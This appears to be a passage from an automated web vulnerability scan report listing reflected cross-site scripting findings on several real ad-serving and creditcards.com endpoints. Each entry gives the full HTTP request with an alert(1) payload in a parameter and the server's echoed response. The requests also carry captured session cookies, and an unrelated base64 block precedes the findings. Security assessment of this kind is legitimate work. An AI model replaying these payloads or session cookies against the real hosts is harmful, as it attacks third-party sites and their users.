fnyzsmfzk3l1AIIHKLg6xO58N0KyQpjFoV8xjzSf/ASvW0Iun8Re86CiCTKGSoH9uXsNgTxraGBfhi+UZrcbjPaHUkaFb833/PBjKY9fcv1R57s5H3ThMxqMJwp2Gk172SVopK438r32J76yvYQBua4VaUIZZ06dlXnnCeqtwrCE11sAznIM74dMYWUtJv7Cgw0XcYvf8Fg1oi71c6R9cqB0gptcIj9FARmfSgytf5mr64EvomAyOGiEUCzJoLtyCYNtb1YqtQoBO51asgBy5NsFm880UfETfJ3+HnyxtlUI9nNzSf5Y446eAu4bthonw8yEzxyvjPCzcxt4lGZLPCxBzzE9CXYPstog/hWGTuemC2U6ePPOlu8pZ/xzTwt2QjmQu1+gSrusmYOsNE2kFDXlH1A0b+1r34IIco1/5L31Pow7J2iuOvmCKc4ADv/d7VXGX/P0dOz84WS+1KOBZt8dn5mGIrvnNPApLTHpc8JS5+qZcbTD3wJFeUkVAyESEJGammG9L0fgOAaIY2T6/MHYLiAhtF8fDqwKp++e8OP0V8dF1SQ5zBO+teondipqjG9zU5jGt3pZpLCxyf96RAGvVKxPSN7onmrjV2lPwa63nxCoS6wf1wQenkVJNh/WGhQaplRiXCUyj6bm+C9oXWnXJrmonxxWb50z2wxVucKtcfirlIqAPR2asjJKv8PpJIZ8isU+TuUXismqdiTJT5a3+YGtEh6LXvL2/BlquUfcQNW3ckDIVfHUwZQsEYR0zgTX2bqgDgmCuAVuMxwOsGpMPg0PHiZwBPEzsnk4PpTIl96mHro8JSniJO6gCVb9gi4bb3BsJgZsZQYcWm58Li6ILIncRUsiTQOWDzXU4e6Fws6RV/saUdYEJ+RIZz4iBjvXafWV3/cTvDvIGsI2IuKUUSFDh04wMaD9/NgTTq/qroQEpjisUdllKHMHZ/QNzdFJTI/Qk3c0YvZVoapnuzf0tDb+pLMo0p8SsdZj0BWorsGrsGd8DTTmJqxA/DFXoFDvl1jCbyze72q5a3ie0irp4d1yvJRmIN0XYcpUkLDBauOWfFQqB1ljH/m9mo6QA/qUXGRDh0J/pi/jyKSqyCEDnrKaw3piWw=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 16 Jun 2011 11:22:25 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 17 Jun 2011 11:22:25 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 11:22:24 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G076081F18B<SCRIPT>ALERT(1)</SCRIPT>F9B215DD1F1" was not recognized.
*/

3.135. http://oc.creditcards.com/trans_node.php [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 47c8b<script>alert(1)</script>d1f16f2257c was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705400772499673&data3=0&sid=1889&c=2214558147c8b<script>alert(1)</script>d1f16f2257c HTTP/1.1
Host: oc.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:45:43 GMT
Server: Apache
Content-Length: 71
Content-Type: text/html

Invalid Clickable ID: 2214558147c8b<script>alert(1)</script>d1f16f2257c

3.136. http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f1445<script>alert(1)</script>230ae680501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705400772499673&data3=0&sid=1889&c=2214/f1445<script>alert(1)</script>230ae6805015581 HTTP/1.1
Host: oc.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:48:57 GMT
Server: Apache
Content-Length: 72
Content-Type: text/html

Invalid Clickable ID: 2214/f1445<script>alert(1)</script>230ae6805015581

3.137. http://pixel.adsafeprotected.com/jspix [advId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cd1f"-alert(1)-"3adb0146782 was submitted in the advId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=124&pubId=test2&advId=netflix7cd1f"-alert(1)-"3adb0146782&campId=banner HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=49B8D20306BC6CA7BEB5A62F2FDB51C9; Path=/
Content-Type: text/javascript
Content-Length: 7929
Date: Thu, 16 Jun 2011 13:08:07 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2&advId=netflix7cd1f"-alert(1)-"3adb0146782&campId=banner",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){
...[SNIP]...

3.138. http://pixel.adsafeprotected.com/jspix [anId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a74b"-alert(1)-"e3d4dda031f was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=1241a74b"-alert(1)-"e3d4dda031f&pubId=test2&advId=netflix&campId=banner HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEA063A926C0350F7ACC83A6CEEBFE76; Path=/
Content-Type: text/javascript
Content-Length: 7929
Date: Thu, 16 Jun 2011 13:08:06 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=1241a74b"-alert(1)-"e3d4dda031f&pubId=test2&advId=netflix&campId=banner",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){i
...[SNIP]...

3.139. http://pixel.adsafeprotected.com/jspix [campId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bac2"-alert(1)-"0dd3be63615 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=124&pubId=test2&advId=netflix&campId=banner8bac2"-alert(1)-"0dd3be63615 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=471EE552B890E62416272E5DE1FA7015; Path=/
Content-Type: text/javascript
Content-Length: 7929
Date: Thu, 16 Jun 2011 13:08:07 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2&advId=netflix&campId=banner8bac2"-alert(1)-"0dd3be63615",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if(o
...[SNIP]...

3.140. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 388be"-alert(1)-"895b3772f04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=124&pubId=test2&advId=netflix&campId=banner&388be"-alert(1)-"895b3772f04=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7637533CAFA640135198BC92CD62CCAC; Path=/
Content-Type: text/javascript
Content-Length: 7932
Date: Thu, 16 Jun 2011 13:08:08 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2&advId=netflix&campId=banner&388be"-alert(1)-"895b3772f04=1",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==="undefined"){G=z.INFO;}if
...[SNIP]...

3.141. http://pixel.adsafeprotected.com/jspix [pubId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b560d"-alert(1)-"1bbf217c240 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=124&pubId=test2b560d"-alert(1)-"1bbf217c240&advId=netflix&campId=banner HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F91B771A5FD7E61BD88D16CFAAF825AF; Path=/
Content-Type: text/javascript
Content-Length: 7929
Date: Thu, 16 Jun 2011 13:08:06 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=124&pubId=test2b560d"-alert(1)-"1bbf217c240&advId=netflix&campId=banner",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function(E,G,C){if(typeof G==
...[SNIP]...

3.142. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 719f7'%3balert(1)//1fb22f7006e was submitted in the admeld_callback parameter. This input was echoed as 719f7';alert(1)//1fb22f7006e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match719f7'%3balert(1)//1fb22f7006e HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1307963584+ \"4\": 1305981633}"; segments_p1="eJwdkL1qAlEUhNmf4nKrfbD0+go+hlgEJaYwlZIQ/GskSFa3MEisxFVCiE2IGhCEVVGyoKRYYTeaM9MMH7Ozc8652lbHvqVt9X4yRZeJIbpZgLcv8MMAXFpD35jx6RR9U1vqnBL0GK8l0BEL7kNo5xXOA/1mFmWjCPwTQ+eStNREifhItz6QGAeozaa1VkPXctrVSmSLXblDZMLJgxicO0O9C5xeG7z6Bn92wOUTalyFICN7zrzpYublCsiLPHa5R/BuAF13uS79Uh/6y6nzKdab8oBnHlzc8E34tfoFDR8xte4IPrFgF8MoZASHBfzfoB39GXLfdWA4s97twcY7YtNlHpF6Yv4D111xlA=="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuHoXcAmwCjRcvbpexYFRo0pL4G0AaMFmM8lwvF6Ikj24MPrQFkGDQYDBgsGoOjk96xA0QsNm1FE34LVnkUT/b0QpHYumujdlyxA0RkfGlBEd85nFciS+PQeWVSUY+YPFoFWZolFp1GFd31lEZjIKHFu+f93yMKzgGZcY5S48vLfO2Sjz75gFWCW2Pf0Horox1dgx+26gCI6ayNI9Nb3gwhRACr9U2M="; io_freq_p1="eJzjEuZYliDAKNFy9ul7FgNGCzDNJcyxJF6ASeLgw+vvWRQYNBgMGCwYgIKPY4AqLzRsRhG8EAoUnIsm+DQAKDjjQwOSoAjHtlCBA0wSn96jiv4IFGhlllh0GlX0VqDAREaJc8v/v0M2dnOMALPEvqf3UASPglw1d9cFFMHucKDgre8HEYIA9TM+0g=="; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICI4NCI6IFsiRno2K0VTL2M5OU82ejVPQiIsIHRydWVdLCAiMTEzIjogWyJGUVdXQzJWSzJEV0YiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:08:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 16-Jun-2011 12:07:52 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 768

document.write('<img width="0" height="0" src="http://tag.admeld.com/match719f7';alert(1)//1fb22f7006e?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1308658092&custom_user_segments=%2C11265%2C45708%2C32515%2C29191%2C13450%2C32180%2C22924%2C41869%2C23954%2C368
...[SNIP]...

3.143. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd8b"><script>alert(1)</script>2f6aa4a4ce6 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=5dd8b"><script>alert(1)</script>2f6aa4a4ce6&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6